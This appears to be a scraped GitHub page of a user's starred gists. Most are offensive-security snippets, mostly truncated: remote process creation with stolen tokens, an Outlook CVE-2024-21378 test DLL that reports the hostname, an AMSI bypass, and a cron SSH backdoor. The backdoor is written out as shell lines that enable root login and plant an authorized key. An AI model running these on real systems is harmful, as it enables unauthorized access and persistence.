Skip to content

Instantly share code, notes, and snippets.

View RalphDesmangles's full-sized avatar

RalphDesmangles

5 followers · 2 following
View GitHub Profile
@jborean93
jborean93 / New-ScheduledTaskSession.ps1
Last active September 21, 2024 10:58
Creates a PSSession that targets a scheduled task process
# Copyright: (c) 2024, Jordan Borean (@jborean93) <jborean93@gmail.com>
# MIT License (see LICENSE or https://opensource.org/licenses/MIT)
Function New-ScheduledTaskSession {
<#
.SYNOPSIS
Creates a PSSession for a process running as a scheduled task.
.DESCRIPTION
Creates a PSSession that can be used to run code inside a scheduled task
@EvanMcBroom
EvanMcBroom / unlock_ldr.cpp
Last active September 1, 2024 05:17
Example code that may be used in DllMain to unlock the loader lock.
// Copyright (C) 2023 Evan McBroom
// Originally authored October 19th, 2023.
//
// Geoff Chappell first documented the format of the loader lock cookie on November 26th, 2008.
// His work is applied here to unlock the loader lock without knowing the original cookie that
// LdrLockLoaderLock returned. This same example code may be safely used in DllMain to unlock
// the loader lock and execute code that would otherwise deadlock the loader.
// Sources:
// - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/ldrapi/lockloaderlock.htm
// - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/ldrapi/unlockloaderlock.htm
@EvanMcBroom
EvanMcBroom / exec_remote_process.cpp
Last active September 1, 2024 05:14
Examples of using an impersonation token instead of explicit credentials to create a process on a remote host via DCOM and MS-WMI.
// Copyright (C) 2024 Evan McBroom
#include <Windows.h>
#include <iostream>
#include <vector>
#include <WbemCli.h>
#include <atlbase.h>
#include <iomanip>
// The modified, compiled IDL file from:
@TheWover
TheWover / SystemProcessInformation.cpp
Last active September 4, 2024 07:40
Demonstrates use of NtQuerySystemInformation and SystemProcessInformation variants to enumerate processes without opening handles
// Demonstrates use of NtQuerySystemInformation and SystemProcessInformation variants to enumerate processes without opening handles
// Author: TheWover
//
#include <iostream>
#include <string>
#include "ntdefs.h"
bool demoSystemProcessInformation(bool full)
{
@Homer28
Homer28 / test_dll.c
Last active July 13, 2024 01:59
DLL code for testing CVE-2024-21378 in MS Outlook
/**
* This DLL is designed for use in conjunction with the Ruler tool for
* security testing related to the CVE-2024-21378 vulnerability,
* specifically targeting MS Outlook.
*
* It can be used with the following command line syntax:
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
*
* After being loaded into MS Outlook, it sends the PC's hostname and
@grahamhelton
grahamhelton / gist:b78f9238544e63c0046b4a20e3aed188
Last active September 12, 2024 12:06
Cron.d ssh backdoor
# Place our backdoor script into /tmp/ssh.sh
# This will be ran by cron
# Run one line at a time. Do not try to paste entire command in at once....
cat << EOF > /tmp/ssh.sh
apt update ; apt install openssh-server -y ; mkdir -p /var/run/sshd && sed -i 's/\#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config && sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd ; mkdir -p /root/.ssh && touch /root/.ssh/authorized_keys ; echo "ENTER YOUR PUBLIC KEY HERE" >> /root/.ssh/authorized_keys ; /usr/sbin/service ssh restart
# Then type EOF and press enter
# Ensure the script has execute permissions
chmod +x /tmp/ssh.sh
@WKL-Sec
WKL-Sec / FuncAddrResolver.cpp
Created March 6, 2024 13:00
Dynamically retrieves the OpenProcess function address by parsing the kernel32.dll export table using Inline Assembly.
// White Knight Labs - Offensive Development
// Inline Assembly - Get Function Address
#include <iostream>
#include <windows.h>
// Function definition
void* GetFunctionAddress(const char* functionName) {
void* getFunctionAddr = nullptr;
@nullenc0de
nullenc0de / block_sec.sh
Created February 16, 2024 16:49
Looks up IP addresses to companies and blocks them via IP tables.
#!/bin/bash
apt install golang -y
GOROOT="/usr/local/go"
PATH="${PATH}:${GOROOT}/bin"
GOPATH=$HOME/go
PATH="${PATH}:${GOROOT}/bin:${GOPATH}/bin"
go install github.com/projectdiscovery/asnmap/cmd/asnmap@latest
@odzhan
odzhan / proc_env_exit.cpp
Last active June 12, 2024 05:01
Resolve dynamic address of Process.Environment.Exit in CLR host process using C++
//
// Resolve dynamic address of Process.Environment.Exit in CLR host process using C++
//
// Based on :
// https://www.mdsec.co.uk/2020/08/massaging-your-clr-preventing-environment-exit-in-in-process-net-assemblies/
// https://github.com/yamakadi/clroxide/blob/214222d578bf62b4c7fc860125268f4eecb9f331/examples/patch_exit.rs
// https://github.com/kyleavery/inject-assembly/blob/8db977c0fd1da039df920f9dd4840d4a3ec2aa2c/src/scmain.c
// https://github.com/TheWover/donut/blob/master/loader/test/rdt.cpp ;)
@rxwx
rxwx / AmsiContextHook.cpp
Created November 30, 2023 17:04
Bypass AMSI on Windows 11 by hooking the AMSI context VTable on the heap with a ROP gadget. Look ma, no code patches!
#include <Windows.h>
#include <Psapi.h>
#include <metahost.h>
#include <comutil.h>
#include <mscoree.h>
#include "patch_info.h"
#include "base\helpers.h"
/**
* For the debug build we want: